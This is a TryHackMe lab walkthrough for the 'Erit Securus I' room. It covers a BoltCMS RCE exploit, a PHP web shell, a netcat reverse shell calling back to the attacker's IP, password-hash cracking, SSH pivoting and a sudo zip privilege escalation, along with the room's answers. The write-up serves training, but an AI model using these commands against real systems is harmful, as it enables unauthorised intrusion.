Erit Securus I TryHackme Writeup

By Shamsher khan This is a Writeup of Tryhackme room “Erit Securus 1”

https://tryhackme.com/room/eritsecurusi

Room link: https://tryhackme.com/room/eritsecurusi
Note: This room is for Premium Members Only. who purchased THM premium membership.

Difficulty level: Easy
Aim: Learn to exploit the BoltCMS software by researching exploit-db. Capture the flags via pivoting and multiple privilege escalation techniques.

Information Gathering

The target IP address is provided when the machine is deployed.

Target: 10.10.196.105

Scanning

We can run a simple nmap scan to look for open ports and services:

nmap -sV 10.10.196.105

From this we can see the following:

  • port 22/tcp — SSH — (OpenSSH 6.7p1)
  • port 80/tcp — HTTP — (nginx 1.6.2)

Question 1. How many ports are open?

Answer:2

Question 2. What ports are open? Comma separated, lowest first: **,**

Answer: 22,80

Enumeration

The CMS that the website is built on can be found in the http-generator field of the nmap scan. This can also be determined by viewing the website via the browser and scrolling to the bottom of the page:

We can use exploit-db to search for an exploit for this particular CMS. The first result for an unauthenticated RCE vulnerability (dated 2020–04–06) sounds promising:

A proof-of-concept python script can be downloaded from exploit-db or Github.

The exploit requires authentication, which means we will require a username and password to proceed. We could attempt to brute force this, but these credentials can be easily guessed using a few simple username/password combinations on the login page.

(To find the login page, simply do a Google search for ‘bolt default login’ and you’ll find this within the link to the Bolt documentation)

Visit the Bolt online user manual to check the section about login. We are told that the login page can be found under the /bolt directory.

There is no indication about default credentials. Let’s take the assumption that there is an admin account, and we will start with some basic passwords (admin, password, …). It worked with admin:password

Question 1. What CMS is the website built on?

Answer: bolt

Gaining Access

We are now ready to run the exploit script against the target:

python3 exploit.py http://10.10.116.95 admin password

Now we have access, we can create a simple PHP shell on the server:

echo '<?php system($_GET["cmd"]);?>'>cmd.php

This can then be used to upload a netcat reverse shell (as there is no netcat on the target machine). First, we will need to create a symbolic link to netcat on our local machine to the current directory on the target. Run this command via a local terminal:

ln -s $(which nc) .

A simple web server can then be started locally in order to serve the file to the target:

python -m SimpleHTTPServer 80

Using the PHP shell we are able to download netcat to the target via the browser:

http://10.10.196.105/files/cmd.php?cmd=chmod 755 nc

Next we need to start a netcat listener on our local machine

nc -nlvp 1234

Finally, we can trigger this connection via the browser to get our reverse shell:

http://10.10.196.105/files/cmd.php?cmd=./nc -e /bin/bash 10.2.12.26.1234

Our reverse shell can then be upgraded to a fully interactive TTY shell by running:

python -c 'import pty;pty.spawn("/bin/bash")'

Question 1. What is the username of the user running the web server?

Answer: www-data

Privilege Escalation

In the /app/database directory you will find the database file: bolt.db

We can access this SQLite 3.x database and run the .tables command to display the database tables:

The bolt_users table looks interesting, let’s have a look at that:

SELECT * FROM bolt_users;

Two users are listed — admin and wildone (Wile E Coyote). There is also an IP address of 192.168.100.1, which might come in handy later.

We’re already admin, so let’s try and crack the hash of wildone using JohnTheRipper and the rockyou wordlist.

First, copy the hash to a file and then run:

john hash.txt -w=/usr/share/wordlists/rockyou.txt

This allows us to switch user to wileec and obtain the first flag:

Pivoting

It appears that wileec also has an ssh private key:

We can use this to try connecting using the internal IP address we found in the bolt_users table of the SQLite database:

Great, it worked… and, even better, we have some sudo privileges:

Question 1. User wileec can sudo! What can he sudo?

Answer: (jsmith) NOPASSWD: /usr/bin/zip

Privilege Escalation #2

We can use the /usr/bin/zip binary to elevate our privileges once again to become user jsmith:

TF=$(mktemp -u)
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'

Awesome! We are now jsmith.

Once again, we can upgrade to a fully interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Next, we can change to the users home directory and grab the second flag:

Taking a look at the sudo privileges for jsmith we can see that this user can literally run any command without a password! From here, we can simply switch to this user, change to the /root directory and grab the final flag:

Question 1. What sudo rights does jsmith have?

Answer: ALL : ALL NOPASSWD: ALL

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer